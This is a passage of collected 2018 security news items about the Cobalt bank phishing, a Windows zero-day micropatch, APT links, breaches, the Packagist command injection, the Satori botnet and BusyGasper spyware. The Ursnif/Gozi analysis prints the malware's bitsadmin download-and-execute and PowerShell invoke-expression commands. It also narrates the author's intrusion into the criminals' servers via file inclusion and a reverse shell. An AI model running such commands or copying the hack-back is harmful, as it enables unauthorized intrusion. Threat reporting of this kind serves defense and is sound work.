The final decision of a judge at the US district court in Bridgeport sentenced Garofano to 8 months in prison and 3 years of supervised release after his prison term is over.

“John H. Durham, United States Attorney for the District of Connecticut, announced that GEORGE GAROFANO, 26, of North Branford, was sentenced today by U.S. District Judge Victor A. Bolden in Bridgeport to eight months of imprisonment, followed by three years of supervised release, for engaging in a phishing scheme that gave him illegal access to more than 200 Apple iCloud accounts, many of which belonged to members of the entertainment industry.” reads the press release published by the Department of Justice.

“GAROFANO, who is released on a $50,000 bond, was ordered to report to prison on October 10, 2018. Judge Bolden ordered GAROFANO to perform 60 hours of community service while on supervised release.”

The other hackers involved in the Fappening case are, Edward Majerczyk, Ryan Collins, and Emilio Herrera, the latter is still awaiting his sentencing.

Garofano was the only one that traded the stolen iCloud credentials and the celebrities naked photos.

Cobalt cybercrime gang targets Russian and Romanian banks
2.9.2018 securityaffairs CyberCrime

On August 13, ASERT observed the Cobalt crime gang actively pushing a new campaign aimed at institutions in eastern Europe and Russia.
Security experts from Netscout’s ASERT uncovered a new campaign carried out by the Cobalt cybercrime group.

The attacks were detected on August 13, 2018, experts revealed that the hackers targeted also the NS Bank in Russia and Carpatica/Patria in Romania.

Cobalt crime gang has been active since at least 2016, it targeted banks worldwide.

Cobalt hackers leverage spear-phishing emails to compromise target systems, messages spoof emails from financial institutions or a financial supplier/partner.

The new campaign discovered by Netscout’s ASERT researchers presents a novelty, One one of the phishing emails sent by Cobalt contains two separate malicious URLs. A weaponized Word document and a binary with a .jpg extension.

The experts also detected two malware samples used in the campaign, a JavaScript backdoor and another malicious code tracked as COOLPANTS, a reconnaissance backdoor associated with the group.

COOLPANTS borrows the code from the Coblnt backdoor, 28 of the 57 functions matched using Diaphora, a tool that compares binaries.


The backdoor connects to hxxps://apstore[.]info, a domain already identified by researchers from Proofpoint as a command and control for Cobalt malware.

2831589 - ETPRO TROJAN Cobalt Group Downloader (apstore .info in DNS Lookup) (trojan.rules)
2831590 - ETPRO TROJAN Cobalt Group Downloader (apstore .info in TLS SNI) (trojan.rules)
Experts form ASERT detected on 13 August 2018, a new sample of COOLPANTS compiled on 1 August 2018. This sample connects to rietumu[.]me as C2, the analysis of the domain allowed the discovery of the email address solisariana[@]protonmail[.]com associated with other five new domains all created on 1 August 2018 (compass[.]plus; eucentalbank[.]com; europecentalbank[.]com; inter-kassa[.]com; and unibank[.]credit).

The domains were clearly used to target the financial institutions.

“Hunting for samples associated with inter-kassa[.]com leads to a phishing email uploaded to VirusTotal, d3ac921038773c9b59fa6b229baa6469. At the time of analysis, VirusTotal scored the phishing email with a 0, indicating nothing malicious was identified by the anti-virus engines.” reads the report.

“Most of the email content appears benign except for a link embedded in the message. The name “Interkassa” appears to be a payment processing system which makes it a prime masquerading target for attackers as noted in the tactics employed by the Cobalt Group for this ongoing campaign.”

The experts analyzed used the inter-kassa domain to search for associated malicious campaigns. They found only a spear-phishing email dated 2 August 2018 addressed to ns-bank bank and sent by “Interkassa.” The mail pretends to be sent from Denys Kyrychenko, co-owner and CTO of Interkassa.

The phishing message includes two malicious links. one of them points to a weaponized Word document with an embedded VBA script. If the victim enables the macros, the script generates a cmd.exe command that launches cmstp.exe with an INF file. The INF file connects to the C2 to fetch a payload that is executed by cmstp.exe.

The attackers used a JavaScript backdoor, tracked as ‘more_eggs,’ that is identical to a backdoor discovered by last year Trend Micro and attributed to Cobalt cybercrime gang.

The backdoor supports the following commands that allow Cobalt to take over an infected system:

d&exec – Downloads and executes a PE file.
more_eggs – Downloads an update for itself.
gtfo – Delete itself and related registry entries.
more_onion – Executes the “new” copy of itself.
vai_x – Executes a command via cmd.
The second link in the spear-phishing email connects the C2 to download an executable rather than an image file. Unfortunately, at the time of analysis, the C2 was not responding.

ASERT discovered also another campaign allegedly linked with Cobalt group targeting Romanian carpatica[.]ro by masquerading as Single Euro Payments Area (SEPA).

“ASERT believes Cobalt Group will continue targeting financial organizations in Eastern Europe and Russia based on the observables in this campaign and their normal modus operandi.” concludes ASERT.

“ASERT also recommends that employees are trained to spot phishing emails and, where possible, closely inspect emails for look-alike domains that might contain malicious attachments or links.”

Further details, including IoCs are reported in the analysis published by the researchers.

Third-Party Patch Released for Windows Zero-Day
31.8.2018 securityweek 

A patch is available for a Windows zero-day that became public knowledge earlier this week, but it’s not from Microsoft.

Instead, the fix comes from 0patch, a community project that aims at addressing software vulnerabilities by delivering tiny fixes to users worldwide. The patches are indeed tiny, usually less than 30 bytes in size.

The fix for this week’s vulnerability is also very small, at only 13 bytes. It was released within 24 hours after the bug was ousted on Twitter on Monday, and, already validated and verified, it is now rolling out to users.

View image on Twitter

· Aug 29, 2018
Okay people, 24 hours after the 0day was published we have a micropatch candidate for @SandboxEscaper's LPE in Task Scheduler. As you can see, scheduler's access to user-controlled hardlink is impersonating the user and gets ACCESS DENIED.

View image on Twitter

Validated and verified, our micropatch for @SandboxEscaper's LPE in Task Scheduler is now published and freely available for everyone to use. It currently applies only to fully updated 64bit Windows 10 1803. We welcome requests for ports to other versions at

2:19 PM - Aug 30, 2018
View image on Twitter43
39 people are talking about this
Twitter Ads info and privacy

The vulnerability was discovered in the Windows Task Scheduler’s Advanced Local Procedure Call (ALPC) interface and was confirmed to impact at least Windows 10 64-bit machines. CERT/CC issued an alert soon after details on the bug were posted online along with proof-of-concept (PoC) code.

“As the researcher's POC demonstrates, one can use this vulnerability to replace a system executable file and wait for a privileged process to execute it. In particular, it was shown that a printing-related DLL could be replaced and then executed by triggering the Print Spooler Service to load it,” 0patch points out in a blog post.

The issue resides in Task Scheduler's SchRpcSetSecurity method, which is externally accessible via ALPC. The method can be called by any local process and sets a desired security descriptor (sddl) on a task or folder.

Because the method “fails to impersonate the requesting client when setting the security descriptor,” Task Scheduler changes the access control list of the chosen file or folder as Local System user for all users, even low-privileged ones.

While the micropatch fully addresses the issue, preventing even variations of the exploit to trigger the vulnerability, users are advised to apply a Microsoft-supplied fix as soon as one becomes available. The unofficial fix might also cause unexpected errors, 0patch warns.

Microsoft’s next set of patches is expected to arrive on September 11 and an official fix for this 0-day is highly likely to be delivered then.

Researchers Draw Connections Between APTs
31.8.2018 securityweek  APT

A newly discovered threat group shares similarities with three advanced persistent threats (APTs), Trend Micro security researchers have discovered.

Referred to as Urpage, the actor is connected to the hacking groups known as Bahamut, Confucius, and Patchwork. Trend Micro found a connection between Confucius and Patchwork in early 2018, but continued the investigation and discovered further evidence of similarities between the groups.

Also known as Dropping Elephant and Chinastrats, Patchwork is a cyberespionage group that associated with various attacks last year. Operating out of the Indian subcontinent, it targets various entities, including United States-based think tanks.

Urpage, which targets InPage (a word processor for Urdu and Arabic languages under Windows and Mac and a de facto standard Urdu publishing tool), is using a Delphi backdoor component that links it to Confucius and Patchwork, as well as Bahamut-like malware, Trend Micro reveals.

Specifically, the actor is using Android malware that matches Bahamut’s code, but which connects to its own command and control (C&C) infrastructure. Also acting as phishing sites, some of these C&C’s attempt to lure users into downloading malicious applications via links to Google Play (the programs are no longer available in the portal).

However, not all C&C websites advertise malicious applications, the security researchers warn. Some of them only contain a random template with empty categories.

Urpage’s malicious programs are designed to steal information from the compromised machines, the same as Bahamut applications to. They can retrieve network information and the MAC address, steal SMS messages and contacts, record audio, retrieve GPS location, and steal files with specific extensions.

One of the applications works on top of a modified version of the legitimate Threema end-to-end encrypted messaging software to steal screenshots of messages. While the modified app works normally, the malicious code, which is hidden from the user, takes screenshots every 10 seconds.

The attacker-linked websites also host malicious documents that link Urpage to other threat actors. These include a RTF file that exploits the CVE-2017-8750 and an InPage file that exploits CVE-2017-12824, both of which are dropping VB backdoors.

Trend Micro discovered that Urpage uses the same Delphi file stealer as the threat actor Confucius, and also that the two are linked via a couple of malicious RTF files that download a similar script.

With the Patchwork group also using the Delphi file stealer, the three groups appear related in some form. The link with Patchwork is further strengthened by an Android application that features code similar to that of Bahamut and a C&C that uses the registration pattern of Patchwork’s group, along with infrastructure close to an old Patchwork domain.

“The many similarities and connections show that threat actors do not work in isolation, and that attacks do not necessarily appear from out of nowhere. This may even suggest that a single development team may be behind this attack — maybe a single paid group that has sold its tools and services to other groups with different goals and targets,” Trend Micro concludes.

Hackers Hit Air Canada Mobile App
31.8.2018 securityweek  Mobil

Air Canada this week notified customers of malicious activity around its mobile app and prompted users to reset their passwords, as a precautionary measure.

The company says it detected unusual login behavior with its mobile application between Aug. 22 and 24, 2018, and that the password reset was the result of that incident.

“We immediately took action to block these attempts and implemented additional protocols to protect against further unauthorized attempts. As an additional security precaution, we have locked all Air Canada mobile App accounts to protect our customers’ data,” the company said.

Out of the 1.7 million Air Canada mobile App user profiles, approximately 20,000 profiles might have been improperly accessed during the attack and the company says it is contacting potentially affected customers directly.

However, all of the company’s mobile users were asked to reset their passwords using improved password guidelines.

Air Canada says users’ credit card information is protected, but recommends keeping an eye on all transactions. The basic profile data stored on the mobile app account includes name, email address, and telephone number.

However, users may also add their Aeroplan number, passport number, NEXUS number, Known Traveler Number, gender, birthdate, nationality, passport expiration date, passport country of issuance, and country of residence. The Aeroplan password is not stored in the app.

“Credit cards that are saved to your profile are encrypted and stored in compliance with security standards set by the payment card industry or PCI standards,” the company says.

As Mark Sangster, VP and industry security strategist at Canadian-based cyber security company eSentire, told SecurityWeek in an emailed statement, one major issue related to this incident is that many of Air Canada’s users are frequent travelers who spend in different countries and geographies, thus “making it harder for credit card providers to identify anomalous spending tied to their accounts.”

He also applauds Air Canada’s swift reaction to the incident, noting that “the window between the point of detection and point of response is critical.” The sooner users learn about a data breach, the quicker they can take action to secure sensitive information.

Matt Chiodi, VP of Cloud Security at RedLock, agrees. “It’s important to note that were it not for the swift actions of Air Canada’s security teams, it could have been exponentially worse since the 20,000 records that were accessed only represented 1% of their overall database,” Chiodi said in an emailed comment.

“As the frequency and voracity of cyberattacks continue to increase, privacy and protection laws, such as the ones introduced in Europe (General Data Protection Rules), and here in Canada with the Personal Information Protection and Electronic Documents Act (PIPEDA), become more critical. These laws need to tighten, ensuring companies have well understood rules and triggers for privacy and data breach notification, timelines for response, and fully understand their obligations when it comes to protecting the information of its employees and customers. Until then, it’s open season on our data and hard-earned wealth,” Sangster concluded.

Critical Vulnerability Patched in PHP Package Repository
31.8.2018 securityweek 

A critical remote code execution vulnerability was recently addressed in, a large PHP package repository, a security researcher reveals.

An open source project, Packagist is the default package server behind Composer, a tool for dependency management in PHP, as it aggregates public PHP packages installable with the utility. The site helps users search for packages and lets Composer know where to get the code from.

Statistics on the website show that Packagist has delivered billions of packages since its inception in 2012, and that it is currently serving around 400 million package installs per month.

What security researcher Max Justicz discovered was that there was a “big text field on the site” that allowed anyone to type $(execute me), which would result in the command being executed in a shell.

The issue, Justicz says, resided in the package repository’s functionality that allows users to upload packages.

“You upload packages to Packagist by providing a URL to a Git, Perforce, Subversion, or Mercurial repository. To identify what kind of repository the URL points to, Packagist shells out to git, p4, svn, and hg, with application-specific commands that include this URL as an argument,” the researcher notes.

However, when checking the provided URL, Packagist was improperly escaping input. Any commands an attacker would have provided were executed twice.

“The Packagist team quickly resolved this issue by escaping the relevant parameters in the Composer repository,” Justicz reveals.

The security researcher, who over the past year discovered multiple issues on popular repositories, warns of the high probability that package manager servers could be compromised in the future.

“The flaw could have been easily avoided by setting parameters on what users can input into text boxes. Without parameters, text boxes become entry points for bad actors to execute malicious commands in order to access the server and, once there, potentially gain access to credentials that will let them hop from one server to another while harvesting sensitive information,” Mike Bittner, Digital Threat Analyst for The Media Trust, told SecurityWeek in an emailed comment.

“Developers should make security a priority all throughout a product's lifecycle stages, from concept to manufacturing to retirement. Website operators should police all their website third-party code providers to ensure their activities align with policies, and scan their sites to identify and obstruct unauthorized code,” Bittner concluded.

Hacking The Hacker. Stopping a big botnet targeting USA, Canada and Italy
31.8.2018 securityaffairs BotNet

Today I’d like to share a full path analysis including a KickBack attack which took me to gain full access to an entire Ursniff/Gozi botnet.
In other words: from a simple “Malware Sample” to “Pwn the Attacker Infrastructure”.
NB: Federal Police have already been alerted on such a topic as well as National and International CERTs/CSIRT (on August 26/27 2018). Attacked companies and compromised hosts should be already reached out. If you have no idea about this topic until now it means, with high probability, you/your company is not involved in that threat. I am not going to publicly disclose the victims IPs.

This disclosure follows the ethical disclosure procedure, which it is close to responsible disclosure procedure but mainly focused on incident rather than on vulnerabilities.
Since blogging is not my business, I do write on my personal blog to share knowledge on Cyber Security, I will describe some of the main steps that took me to own the attacker infrastructure. I will not disclose the found Malware code nor the Malware Command and Control code nor details on attacker’s group since I won’t put on future attackers new Malware source code ready to be used.
My entire “Cyber adventure” began with a simple email within a .ZIP file named “Nuovo” as an apparently normal attachment (sha256: 79005f3a6aeb96fec7f3f9e812e1f199202e813c82d254b8cc3f621ea1372041) . Inside the ZIP a .VBS file (sha265: 42a7b1ecb39db95a9df1fc8a57e7b16a5ae88659e57b92904ac1fe7cc81acc0d) which for the time being August 21 2018 was totally unknown from VirusTotal (unknown = not yet analysed) was ready to get started through double click. The VisualBasic Script (Stage1) was heavily obfuscated in order to avoid simple reverse engineering analyses on it, but I do like de-obfuscate hidden code (every time it’s like a personal challenge). After some hardworking-minutes ( 😀 ) Stage1 was totally de-obfuscated and ready to be interpreted in plain text. It appeared clear to me that Stage1 was in charged of evading three main AVs such as: Kaspersky Lab, Panda Security, and Trend Micro by running simple scans on Microsoft Regedit and dropping and executing additional software.

Stage1. Obfuscation
Indeed if none of searched AV were found on the target system Stage1 was acting as a simple downloader. The specific performed actions follow:

"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer msd5 /priority foreground C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe &schtasks /create /st 01:36 /sc once /tn srx3 /tr C:\Users\J8913~1.SEA\AppData\Local\Temp/rEOuvWkRP.exe
Stage1 was dropping and executing a brand new PE file named: rEOuvWkRP.exe (sha256: 92f59c431fbf79bf23cff65d0c4787d0b9e223493edc51a4bbd3c88a5b30b05c) using the bitsadmin.exe native Microsoft program. BitsAdmin.exe is a command-line tool that system admin can use to create download or upload jobs and monitor their progress over time. This technique has been widely used by Anunak APT during bank frauds in the past few years.

The Stage2 analysis (huge step ahead here) brought me to an additional brand new Drop and Decrypt stager. Stage3 introduced additional layers of anti-reverse engineering. The following image shows the additional PE section within high entropy on it. It’s a significative indication of a Decrypter activity.

Stage2. Drop and Decrypt the Stage3. You might appreciate the high Entropy on added section

Indeed Stage 3 (sha256: 84f3a18c5a0dd9af884293a1260dce1b88fc0b743202258ca1097d14a3c9d08e) was packed as well. A UPX algorithm was used to hide the real payload in such a way many AV engines were not able to detect it since the signature was changing from the original payload. Finally the de-packed payload presented many interesting features; for example, it was weaponized with evasion techniques such as: timing delay (through sleep), loop delay by calling 9979141 times GetSystemTimeAsFileTime API, BIOSversioning harvesting, system manufacturer information and system fingerprinting to check if it was running on the virtual or physical environment. It installed itself on windows auto-run registry to get persistence on the victim machine. The following action was performed while running in background flag:
cmd.exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\4CA108BF-3B6C-5EF4-2540-9F72297443C6’).Audibrkr))

The final payload executed the following commands and spawned two main services (WSearch, WerSvc) on the target.

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

\\?\C:\Windows\system32\wbem\WMIADAP.EXE wmiadap.exe /F /T /R

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:209921 /prefetch:2

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2552 CREDAT:406536 /prefetch:2

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:264 WinX:0 WinY:0 IEFrame:0000000000000000

C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:65800 WinX:0 WinY:0 IEFrame:0000000000000000

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:209921 /prefetch:2

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3004 CREDAT:144390 /prefetch:2

C:\Windows\system32\SearchIndexer.exe /Embedding

taskhost.exe SYSTEM


taskhost.exe $(Arg0)

C:\Windows\System32\svchost.exe -k WerSvcGroup

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Windows\system32\SearchFilterHost.exe" 0 552 556 564 65536 560

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11082 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11083 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11084 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe5_ Global\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Windows\sysWow64\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11086 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3908037912-2838204505-3570244140-11087 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" "1"

"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe8_ Global\UsGthrCtrlFltPipeMssGthrPipe8 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:592 CREDAT:209921 /prefetch:2

cmd /C "nslookup > C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"

cmd /C "echo -------- >> C:\Users\J8913~1.SEA\AppData\Local\Temp\34B0.bi1"

C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader"

C:\Windows\system32\WerFault.exe -u -p 2524 -s 288

"C:\Windows\system32\wermgr.exe" "-queuereporting_svc" "C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_82b9a110b3b94c55171865162b471ffb8fadc7c6_cab_0ab86b12"

Stage3 finally connects back to C2s once checked its own ip address. Two main C2s were observed:
C2 level_1 (for domains and IPs check the IoC section). The Stage3 connects back to C2 level_1 to get weaponised. Level_1 Command and Controls get information on victims and deliver plugins to expand the infection functionalities.
C2 level_2 (for domains and IPs check the IoC section). Stage 3 indirectly connects to C2 level_2 in order to give stolen information. It ‘s a Ursniff/Gozi and it exfiltrates user credentials by looking for specific files, getting user clipboard and by performing main in the browser attack against main websites such as PayPal, Gmail, Microsoft and many online services.
So far so good. Everything looks like one of my usual analyses, but something got my attention. The C2 level_1 had an administration panel which, on my personal point of view, was “hhandmade and pretty “young” as implementation by mthe eaning of HTML with not client side controls, no clickjacking controls and not special login tokens. According to Yoroi’s mission (to defend its customers) I decided to go further and try to defend people and/or infected companies by getting inside the entire network and to collaborate to local authorities to shut them down, by getting as much information as possible in order to help federal and local police to fight the Cyber Crime.
Fortunately ,I spotted a file inclusion vulnerability in Command and Control which took me in ! The following image shows a reverse shell I spawned on Attacker’s command and control.

Now, I was able to download the entire Command and Control Source Code (php) and study it ! The study of this brand new C2 took me to the next level. First of all I was able to get access to the local database where I found a lot of infected IPs (the IPs which were communicating back to C2 level_1). The following image proves that the downloaded Command and Control system has Macedonian dialect (Cyrillic language) on it, according to Anunak APT report made by group-ib.

Command and Control Source Code (snip)
The following image represents a simple screenshot of the database dump within Victim IPs (which are undisclosed for privacy reasons).

C2 level_1 Database
Additional investigations on database brought new connected IPs. Those IPs were querying the MySQL with administrative rights. At least athe dditional two layers of C2 were present. While the level_1 was weaponising the malware implant the level_2 was collecting information from victims. Thanks to the source code study has been possibile to found more 0Days to be used against C2 and in order to break into the C2 level_2 . Now I was able to see encrypted URLs coming from infected hosts. Important steps ahead are intentionally missing. Among many URLs the analyst was able to figure out a “test” connection from the Attacker and focus to decrypt such a connection. Fortunately ,everything needed was written on command and control source code. In the specific case ,the following function was fundamental to get to clear text !

URL Decryption Function
The eKey was straight on the DB and the decryption function was quite easy to reverse. Finally it was possible to figured out how to decrypt the attacker testing string (the first transaction available on logs) and voilà, it was possible to checkin in attacker’s email 😀 !

Attacker eMail: VPS credentials
Once “in” a new need came: discovering the entire network by getting access to the VPS control panel. After some active steps directly on the attacker infrastructure, it was possible to get access to the entire VPS control panel. At this point it was clear the general infrastructure picture* and how to block the threat, not only for customers but for everybody !

Attacker VPS Environment

Sharing these results for free would make vendors (for example: AV companies, Firewall companies, IDS companies and son on) able to update their signatures and to block such a threat for everybody all around the world. I am sure that this work would not block malicious actors, BUT at least we might rise our voice against cyber criminals !

In this post, I described the main steps that took me to gain full access to a big Ursniff/Gozi Botnet in order to shut it down by alerting federal and national authorities (no direct destructive actions have been performed on attacker infrastructure). The threat appeared very well structured, Docker containers were adopted in order to automatise the malicious infrastructure deployment and the code was quite well engineered. Many layers of command and control were found and the entire infrastructure was probably set up from a criminal organisation and not from a single person.
The following graph shows the victim distribution on August 2018. The main targets currently are USA with a 47% of the victims, followed by Canada (29.3%) and Italy (7.3%). Total victims on August 2018 are several thousands.

Victims Distribution on August 24 2018

During the analyses was interesting to observe attacker was acquiring domains from an apparent “black market”where many actors where selling and buying “apparent compromised domains” (no evidence on this last sentence, only feeling). The system (following picture) looks like a trading platform within public API that third party systems can operate such as stock operators.

Apparent Domain BlackMarket
Hope you enjoyed the reading.

Further details, including the Indicators of compromise, are reported in the analysis published by Marco Ramilli on his blog.

Federal prosecutors indicted a 20-year-old man who built the Satori botnet
31.8.2018 securityaffairs BotNet

A youngster (20) from Washington was indicted last week on federal computer hacking charges after rival hackers fingered him as the creator of a Mirai variant dubbed Satori.
MalwareMustDie Team: “It’s time for every teenager or young man to know that playing with malware is the fastest way to finish in the jail”

Mirai, Mirai and again Mirai: after the source code has been leaked online gangs of teenagers have been engaged in a new playground. Based on a (solid) software infrastructure Mirai is still able to work well and to be lethal also because the effort to update it is not titanic and the skills of the hacker can be modest. In other words, infecting the Planet nowadays it is (still) very easy and the attack pattern seems clear: download Mirai source code, change the exploits, and everything works fine, but this time the story did not have a happy ending.

The news comes from the legendary Kevin Poulsen who has posted the news on the Daily Beast reporting that “a 20-year-old Washington man was indicted last week on federal computer hacking charges after rival hackers fingered him as the creator of a notorious botnet tearing through routers around the world.”

“last December, researchers at the Check Point cybersecurity firm traced Satori to an amateur known as “Nexus Zeta” who frequented a web forum for untrained and wannabe malicious hackers. Two months later, a little-noticed Pastebin post by rival hackers purported to reveal Nexus Zeta’s real identity, naming the same Kenneth Schuchman indicted last week.” wrote Poulsen.

Then Kenneth Schuchman who “lives in Vancouver, Washington with his father”, now is indicted even if the indictment doesn’t name the malware, but “all signs point to the virulent Satori botnet that surfaced last fall, and has infected at least 500,000 internet routers around the word”, added Kevin Poulsen.

The activity of the Satori botnet has been observed by CheckPoint security at the end of 2017, below the findings included in a report published by the firm.

“A Zero-Day vulnerability (CVE-2017-17215) in the Huawei home router HG532 has been discovered by Check Point Researchers, and hundreds of thousands of attempts to exploit it have already been found in the wild.
The delivered payload has been identified as OKIRU/SATORI, an updated variant of Mirai.
The suspected threat actor behind the attack has been identified by his nickname, ‘Nexus Zeta’.” states the report published by Check Point security

The strange thing about those wannabe hackers is that their emotional background plays a crucial role during the investigation: as Mr. Poulsen reports Kenneth Schuchman wrote on Facebook in 2015 regarding Pokemon Go: “I do black hat hacking all the time and I haven’t even downloaded this game let alone played it.”. From “blackhat hacking all the time” to the jail the passage is short.

I asked a quick comment to Odisseus, an Italian member of the MalwareMustDie team. MalwareMustDie members fight against malware since a long time and is the group who firstly, in the world, discovered and analyzed Mirai for the very first time in the late August 2016 thanks to the excellent reverse engineering skills of their head @unixfreaxjp.

“It’s been two years since Mirai has been discovered and it’s still able to infect thousands of routers around the world: but this news appears like a symbolic anniversary. It is very important to give space to this kind of news because every teenager or young man needs to know that playing with malware is the fastest way to finish in jail”.

BusyGasper – the unfriendly spy
31.8.2018 Kaspersky Android
In early 2018 our mobile intruder-detection technology was triggered by a suspicious Android sample that, as it turned out, belonged to an unknown spyware family. Further investigation showed that the malware, which we named BusyGasper, is not all that sophisticated, but demonstrates some unusual features for this type of threat. From a technical point of view, the sample is a unique spy implant with stand-out features such as device sensors listeners, including motion detectors that have been implemented with a degree of originality. It has an incredibly wide-ranging protocol – about 100 commands – and an ability to bypass the Doze battery saver. As a modern Android spyware it is also capable of exfiltrating data from messaging applications (WhatsApp, Viber, Facebook). Moreover, BusyGasper boasts some keylogging tools – the malware processes every user tap, gathering its coordinates and calculating characters by matching given values with hardcoded ones.

The sample has a multicomponent structure and can download a payload or updates from its C&C server, which happens to be an FTP server belonging to the free Russian web hosting service Ucoz. It is noteworthy that BusyGasper supports the IRC protocol which is rarely seen among Android malware. In addition, the malware can log in to the attacker’s email inbox, parse emails in a special folder for commands and save any payloads to a device from email attachments.

This particular operation has been active since approximately May 2016 up to the present time.

Infection vector and victims
While looking for the infection vector, we found no evidence of spear phishing or any of the other common vectors. But some clues, such as the existence of a hidden menu for operator control, point to a manual installation method – the attackers used physical access to a victim’s device to install the malware. This would explain the number of victims – there are less than 10 of them and according to our detection statistics, they are all located in the Russia.

Intrigued, we continued our search and found more interesting clues that could reveal some detailed information about the owners of the infected devices. Several TXT files with commands on the attacker’s FTP server contain a victim identifier in the names that was probably added by the criminals:

Some of them sound like Russian names: Jana, SlavaAl, Nikusha.

As we know from the FTP dump analysis, there was a firmware component from ASUS firmware, indicating the attacker’s interest in ASUS devices, which explains the victim file name that mentions “ASUS”.

Information gathered from the email account provides a lot of the victims’ personal data, including messages from IM applications.

Gathered file Type Description
lock Text Implant log
ldata sqlite3 Location data based on network (cell_id)
gdata sqlite3 Location data based on GPS coordinates
sdata sqlite3 SMS messages
f.db sqlite3 Facebook messages
v.db sqlite3 Viber messages
w.db sqlite3 WhatsApp messages
Among the other data gathered were SMS banking messages that revealed an account with a balance of more than US$10,000.But as far as we know, the attacker behind this campaign is not interested in stealing the victims’ money.

We found no similarities to commercial spyware products or to other known spyware variants, which suggests BusyGasper is self-developed and used by a single threat actor. At the same time, the lack of encryption, use of a public FTP server and the low opsec level could indicate that less skilled attackers are behind the malware.

Technical details
Here is the meta information for the observed samples, certificates and hardcoded version stamps:

Certificate MD5 Module Version
Serial Number: 0x76607c02
Issuer: CN=Ron
Validity: from = Tue Aug 30 13:01:30 MSK 2016
to = Sat Aug 24 13:01:30 MSK 2041
Subject: CN=Ron 9e005144ea1a583531f86663a5f14607 1 –
18abe28730c53de6d9e4786c7765c3d8 2 2.0
Serial Number: 0x6a0d1fec
Issuer: CN=Sun
Validity: from = Mon May 16 17:42:40 MSK 2016
to = Fri May 10 17:42:40 MSK 2041
Subject: CN=Sun 9ffc350ef94ef840728564846f2802b0 2 v2.51sun
6c246bbb40b7c6e75c60a55c0da9e2f2 2 v2.96s
7c8a12e56e3e03938788b26b84b80bd6 2 v3.09s
bde7847487125084f9e03f2b6b05adc3 2 v3.12s
